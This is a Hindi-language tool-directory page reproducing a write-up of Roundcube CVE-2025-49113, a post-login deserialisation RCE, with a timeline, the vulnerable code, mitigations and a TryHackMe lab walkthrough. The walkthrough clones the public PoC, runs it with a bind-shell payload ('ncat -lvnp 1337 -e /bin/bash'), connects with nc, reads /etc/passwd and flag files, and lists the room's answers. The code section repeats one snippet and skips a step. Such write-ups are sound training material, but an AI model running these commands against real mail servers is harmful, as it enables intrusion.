Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Roundcube_CVE-2025-49113 — स्पष्टीकरण + THM पर लैब | Kitploit
उपकरण/GitHubGitHub/5kr1pt/roundcube_cve-2025-49113
भेद्यता विश्लेषणशोषणशेलकोडवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंटलैब और अभ्यास
GitHub5kr1pt/roundcube_cve-2025-49113

Roundcube_CVE-2025-49113

स्पष्टीकरण + THM पर लैब

31 साल पहलेअभी तक समीक्षित नहीं
रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Roundcube में RCE (CVE-2025-49113) - मेरा Obsidian नोट .md

{{date}} {{time}}

स्थिति: पूर्ण

लैब: आसान

टैग: [[RCE]] | [[PHP]] | [[LAB_THM]] | [[EXPLOIT]] | [[CVE]]

द्वारा KRPT Paulo G. Werneck - Linkedin - in.com/pgw-script


प्रभाव: लॉगिन के बाद रिमोट कमांड निष्पादन (CVSS 9.9)
प्रभावित संस्करण: ≤ 1.5.10 / 1.6.10
पैच किया गया: 1.5.11 और 1.6.11


1 – समयरेखा

दिनांकघटना
~2014program/actions/settings/upload.php रूट का परिचय जिसमें session->append() का उपयोग बिना सत्यापन के किया गया।
03 जून 2025@FearsOff के शोधकर्ताओं ने सलाहकार जारी किया और PoC की घोषणा की।
04 जून 2025Roundcube ने commit 0376f69 (1.6-stable) और commit 7408f31 (1.5-lts) लागू किया।
06 जून 2025PoC गिटहब पर प्रकाशित हुई। (fearsoff-org/CVE-2025-49113)
10 जून 2025बड़े पैमाने पर शोषण।

2 – समस्या कहाँ थी

कमजोर कोड (1.6.10)

root@kitploit:~
// program/actions/settings/upload.php 
$from = rcube_utils::get_input_string('_from', rcube_utils::INPUT_GET);
$type = preg_replace('/(add|edit)-/', '', $from);

// … more below
$rcmail->session->append($type . '.files', $id, $attachment);

_from इनपुट GET से पूरी तरह आता है, फिर सत्र में एक नोड के नाम का हिस्सा बन जाता है और
पहले append() के दौरान, Roundcube यह करता है:

root@kitploit:~
// program/actions/settings/upload.php

$from = rcube_utils::get_input_string('_from', rcube_utils::INPUT_GET);

$type = preg_replace('/(add|edit)-/', '', $from);

// … more below

$rcmail->session->append($type . '.files', $id, $attachment);

यदि फ़ाइल मौजूद है, तो RCE काम कर गया।


3 – शमन

  1. अपडेट करें तुरंत ≥ 1.6.11 या ≥ 1.5.11 पर।

  2. यदि अपडेट नहीं कर सकते, तो WAF, फ़ायरवॉल या रीराइट के माध्यम से %22, %7C, !, . या नियंत्रण बाइट्स वाले किसी भी _from को ब्लॉक करें।

  3. php.ini में खतरनाक फ़ंक्शन (proc_open, exec, आदि) को निष्क्रिय करें।

  4. सेटिंग्स पैनल में अपलोड ब्लॉक करें और लॉग पर नज़र रखें।


4 - लैब - TryHackme - राइटअप

फ्री रूम: https://tryhackme.com/room/roundcubecve202549113

tryhackme और strategos द्वारा बनाया गया

1. टोही

  1. VM (MACHINE_IP) और AttackBox खोलें।

  2. इसके साथ http://MACHINE_IP/roundcube पर जाएं:

    उपयोगकर्ता: ellieptic पासवर्ड: ChangeMe123

    यह काम करेगा और सामान्य रूप से लॉगिन होगा:

    लॉगिन स्क्रीन


2. एक्सप्लॉइट तैयार करें

यह सुनिश्चित करने के बाद कि सब कुछ चालू है, हम एक्सप्लॉइट चलाएंगे, इसके लिए हम पहले बताए गए गिटहब पर पोस्ट की गई PoC तक पहुंचेंगे और gitclone करेंगे:

root@kitploit:~
mkdir tmp
cd tmp
git clone https://github.com/fearsoff-org/CVE-2025-49113
cd CVE-2025-49113

एक्सप्लॉइट


3. पेलोड तैयार करें

पेलोड का उपयोग सरल है, बस बाइंड शेल बनाएं और नीचे दिए गए उपयोग के अनुसार .php फ़ाइल के साथ एक पोर्ट की ओर इंगित करें:

php CVE-2025-49113.php <साइट> <उपयोगकर्ता> <पासवर्ड> "<बाइंड शेल>"

php CVE-2025-49113.php http://MACHINE_IP/roundcube ellieptic ChangeMe123 "ncat -lvnp 1337 -e /bin/bash"

– स्क्रिप्ट लॉगिन करती है, _from पैरामीटर में दुर्भावनापूर्ण PHP ऑब्जेक्ट इंजेक्ट करती है, जैसा कि हमने पहले बताया, upload.php एंडपॉइंट को कॉल करती है और फिर session_decode() → unserialize() → proc_open() को ट्रिगर करने के लिए लॉगआउट करती है।

कभी-कभी यह CSRF त्रुटि दिखाता है; इसे अनदेखा करें और अगले चरण पर जाएं,
क्योंकि कमांड आमतौर पर फिर भी निष्पादित हो जाता है।

एक्सप्लॉइट


4. शेल से कनेक्ट करें

यदि बाइंड शेल सफल रही, तो यह पोर्ट 1337 पर सुन रही है जो हमने दिया था, बस अब उससे कनेक्ट करें:

nc MACHINE_IP 1337

शेल प्राप्त हुई।

शेल


5. प्रश्नों के उत्तर देना

प्रश्न और उत्तर

  1. उपयोगकर्ता Maggie
    प्रश्न: एक उपयोगकर्ता का पहला नाम Maggie है। उसका अंतिम नाम क्या है?
    उत्तर: Byte

इस प्रश्न को हल करने के लिए हम maggie के उपयोगकर्ता को grep करते हुए /etc/passwd पर cat कर सकते थे, या बस /home पर ls कर सकते थे।

1

  1. /etc में फ़्लैग
    प्रश्न: /etc में सहेजे गए फ़्लैग का मान क्या है?
    उत्तर: THM{ICE_CUBE_DESERIALISATION}

इसे हल करने के लिए, मैंने cat /etc/flag* चलाया और सौभाग्य से फ़ाइल का नाम flag था और इससे हम इसे पकड़ने में सफल रहे।

2


5 – संदर्भ

  • कमिट 1.6.11 – https://github.com/roundcube/roundcubemail/commit/0376f69e958a8fef7f6f09e352c541b4e7729c4d

  • कमिट 1.5.11 – https://github.com/roundcube/roundcubemail/commit/7408f31379666124a39f9cb1018f62bc5e2dc695

  • FearsOff राइट-अप – https://fearsoff.org/research/roundcube

  • OffSec ब्लॉग – https://www.offsec.com/blog/cve-2025-49113/ offsec.com

  • TryHackme - TryHackMe | Roundcube: CVE-2025-49113

  • GHSA सलाहकार – https://github.com/advisories/GHSA-8j8w-wwqc-x596 github.com

टूल डाउनलोड करें